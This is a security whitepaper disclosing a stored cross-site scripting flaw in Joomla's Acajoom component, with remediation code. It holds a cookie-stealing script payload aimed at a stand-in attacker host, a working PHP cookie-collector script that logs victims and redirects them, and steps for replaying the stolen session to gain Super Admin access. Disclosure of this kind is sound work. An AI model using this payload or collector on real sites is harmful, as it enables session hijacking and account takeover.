Cross Site Scripting in Joomla Acajoom Component

Whitepaper
Cross Site Scripting in Joomla Acajoom Component
Vandan Joshi, December 2011

TABLE OF CONTENTS
Abstract
Introduction
A Likely Scenario
The Exploit
The Impact
Recommended Solutions
About Author
About SecurEyes

Abstract

A stored cross site scripting (XSS) vulnerability has been found in Acajoom, a popular newsletter component for Joomla. By exploiting it, a user with the Admin role can steal the session cookie of a Super Admin user and take over that account.

Introduction

Joomla

Joomla is a popular free and open source Content Management System managed by the Joomla Foundation. It is a community-driven CMS that lets site owners install components and extensions developed by third parties. This makes Joomla feature-rich and flexible, but it also means that a vulnerability in any installed extension, such as XSS or SQL injection, becomes a vulnerability of the whole site.

Acajoom

Acajoom is a popular Joomla component for sending newsletters to subscribed users. It is easy to configure and use, and lets users design their own newsletters with embedded images and HTML editing.

[Screenshot: Acajoom 5.1.5]

XSS Vulnerability

Cross site scripting (XSS) is considered one of the most dangerous classes of web attack. When an application accepts user input without validating it and later sends that input back to a browser without encoding it, an attacker can execute scripts of his choosing in the browsers of victim users. With this attack vector, malicious users can hijack accounts, deface websites, carry out phishing attacks and so on.

XSS attacks are broadly categorized as reflected or stored. In a reflected XSS attack, the malicious input is reflected straight back by the vulnerable application: typically the attacker lures a victim into clicking a link that carries the script in a URL parameter, and the script is reflected back and executed in the victim's browser. In a stored XSS attack, the attacker saves the script in the application through a vulnerable page, and it executes whenever a victim views the page where the stored value is rendered. The Acajoom vulnerability described below is of the stored kind.

Joomla 1.5.18 Acajoom stored cross site scripting vulnerability

The following sections describe the vulnerability in the send mail path configuration parameter (config['sendmail_path']) of the Acajoom component.

A Likely Scenario

Joomla has Admin and Super Admin roles, with the Super Admin holding higher privileges than the Admin. Consider a malicious Admin user who wants to gain access to Super Admin functionality. One way to do this is to obtain the Super Admin's session ID by way of an XSS attack. Below is a step-by-step description of how this can be done using the XSS vulnerability in the Joomla Acajoom component.

Step 1: The malicious Admin user browses to http://www.vulnerable123.com/test/administrator/index.php and enters his credentials.

Step 2: He opens the vulnerable configuration page of the Acajoom component at http://www.vulnerable123.com/test/administrator/index.php?option=com_acajoom&act=configuration

Step 3: He injects the following XSS vector into the send mail path parameter:

"<script>document.location="http://www.attacker123.com/cookie.php?c= " + document.cookie</script>

[Screenshot: the malicious vector entered in the send mail path field]

Step 5: He clicks the Save button as shown.

Step 6: The malicious user logs out of the application after saving the configuration.

XSS vector and cookie.php

"<script>document.location="http://www.attacker123.com/cookie.php?c= " + document.cookie</script>

1. www.attacker123.com is a site maintained by the attacker.
2. cookie.php is a script on that site that reads the GET parameter c, which carries the victim's cookies, and writes its value to an HTML file.
3. It also records the IP address and Referer value of the victim's request.
4. Finally, cookie.php redirects the victim to the home page of the vulnerable site, http://www.vulnerable123.com/test/administrator/index.php, by means of a Location header, so that the victim is unaware of the attack.

[Screenshot: cookie.php]

Cookie.html is the file in which the victim's cookie value is written together with the IP address and Referer. The Location header redirects the victim to the home page of the vulnerable site so that the victim is unaware of the attack.
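The collector described in the list above, reconstructed as an added example. It is not the paper's own cookie.php, which appears in the original only as a screenshot; it assumes the host names and the file name cookie.html from the steps above and that the script is placed on the attacker's web server.

```php
<?php
// Added example: a reconstruction of the cookie.php the whitepaper describes,
// not the paper's own file. Assumed: it is served from www.attacker123.com
// and writes cookie.html in the same directory.

// The vector appends document.cookie to the query string as parameter c.
$cookie   = isset($_GET['c']) ? $_GET['c'] : '';
$ip       = isset($_SERVER['REMOTE_ADDR']) ? $_SERVER['REMOTE_ADDR'] : '';
$referrer = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : '';

// One record per victim request. The values are HTML-encoded so that
// cookie.html itself does not execute anything the victim's browser sent.
$record = sprintf(
    "<p>Cookie: %s<br>IP: %s<br>Referer: %s<br>Time: %s</p>\n",
    htmlspecialchars($cookie, ENT_QUOTES, 'UTF-8'),
    htmlspecialchars($ip, ENT_QUOTES, 'UTF-8'),
    htmlspecialchars($referrer, ENT_QUOTES, 'UTF-8'),
    gmdate('c')
);
file_put_contents(__DIR__ . '/cookie.html', $record, FILE_APPEND | LOCK_EX);

// Send the victim straight on to the site's own administrator page, as the
// paper describes, so that nothing appears out of the ordinary.
header('Location: http://www.vulnerable123.com/test/administrator/index.php');
exit;
```

Nothing is written before the Location header is sent, so the redirect is issued correctly; the encoded record keeps the captured values readable but inert when cookie.html is opened in a browser.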

The Exploit

Step 7: A Super Admin user browses to the configuration page at http://www.vulnerable123.com/test/administrator/index.php?option=com_acajoom&act=configuration. The stored script runs in his browser, sends his cookies to www.attacker123.com/cookie.php, and he is redirected to the home page. The Super Admin is unaware of the attack; in the background his cookie value has been recorded in cookie.html on the attacker's site.

[Screenshot: cookie.html on www.attacker123.com, the attacker's site, showing the cookie and Referer value of the victim]

Step 8: The malicious user can now use this cookie value to gain unauthorized access to the application as Super Admin. He requests the internal page at http://www.vulnerable123.com/test/administrator/index.php and captures the request in an HTTP interceptor.

NOTE: An HTTP interceptor is a proxy tool that captures the data flowing between a browser and a web server. Burp Suite's proxy was used during this test.

Step 9: In the interceptor he adds the stolen cookie value to the Cookie header of the captured request, as shown, and forwards the request.

Step 10: He now has access to all functionality of the Super Admin role, as shown.

The Impact

As described, user sessions can be hijacked through this attack, here turning an Admin account into Super Admin access. The same vulnerability can also be used for phishing and for defacing the site, since the attacker's script runs in the browser of every user who views the configuration page.

Recommended Solutions

1. White list validation of all user entered parameters. Only data in a known-good format should be accepted (for the send mail path, a file system path and its flags); anything else should be rejected and an error page shown. Validation must be performed on the server side; client-side validation helps usability but is trivially bypassed and gives no protection on its own.

2. Proper output encoding of user entered strings whenever they are rendered back into a page, using an encoder appropriate to the context. Here the value is rendered inside an HTML attribute, which is why the vector begins with a double quote to close that attribute.

3. Mark the session cookie as HttpOnly so that document.cookie cannot read it. This does not remove the XSS, but it blocks the cookie theft used in this scenario.
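An added example, not Acajoom's or Joomla's code, that puts the vector from Step 3 next to the first two recommended fixes in a stripped-down PHP configuration form. The function names, the $config array and the path format accepted by the white list are assumptions for illustration.

```php
<?php
// Added example, not Acajoom's code. The names below ($config, render_*,
// validate_sendmail_path) and the accepted path format are assumptions.

// The vector from Step 3. Its leading double quote closes the value="..."
// attribute, so the <script> tag that follows lands in the page body.
$vector = '"<script>document.location="http://www.attacker123.com/cookie.php?c= " + document.cookie</script>';

// Vulnerable rendering: the stored value is concatenated straight into an
// HTML attribute, so whatever was saved is sent back to every browser that
// opens the configuration page.
function render_sendmail_field_vulnerable(array $config): string
{
    return '<input type="text" name="sendmail_path" value="'
        . $config['sendmail_path'] . '">';
}

// Fix 2, output encoding: escape for the attribute context. ENT_QUOTES is
// required because the attribute is delimited by double quotes and the
// vector starts with one.
function render_sendmail_field_safe(array $config): string
{
    $value = htmlspecialchars($config['sendmail_path'], ENT_QUOTES, 'UTF-8');
    return '<input type="text" name="sendmail_path" value="' . $value . '">';
}

// Fix 1, white-list validation on save: accept only an absolute path built
// from a small character set, optionally followed by flags such as "-t -i".
// Returns the cleaned value, or null when the caller should show the error
// page instead of saving.
function validate_sendmail_path(string $input): ?string
{
    $input = trim($input);
    if (preg_match('#\A/[A-Za-z0-9_./-]+(?: -[A-Za-z0-9-]+)*\z#', $input) === 1) {
        return $input;
    }
    return null;
}

// Demonstration with the vector as the stored configuration value.
$config = ['sendmail_path' => $vector];

// The attribute is closed by the vector's first character and the script
// runs when the page is viewed.
echo render_sendmail_field_vulnerable($config), "\n";

// Every quote and angle bracket is encoded; the browser shows the vector as
// text inside the input and executes nothing.
echo render_sendmail_field_safe($config), "\n";

// A normal sendmail path passes the white list; the vector is rejected before
// it is ever stored, so the rendering question never arises for it.
var_dump(validate_sendmail_path('/usr/sbin/sendmail -t -i'));
var_dump(validate_sendmail_path($vector));
```

Run it with the php command-line interpreter: the first echo shows the attribute broken open by the vector, the second shows it intact. Both fixes are worth applying together, since the white list stops the vector from being stored and the encoding protects against any other value that reaches the page.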

About Author

Vandan Joshi is an associate information security consultant at SecurEyes. He can be reached at vandan.joshi@secureyes.net

About SecurEyes

SecurEyes is a Bangalore-based firm specializing in IT security. SecurEyes offers a wide range of security services and products to its clients. For more information, visit our website: http://www.secureyes.net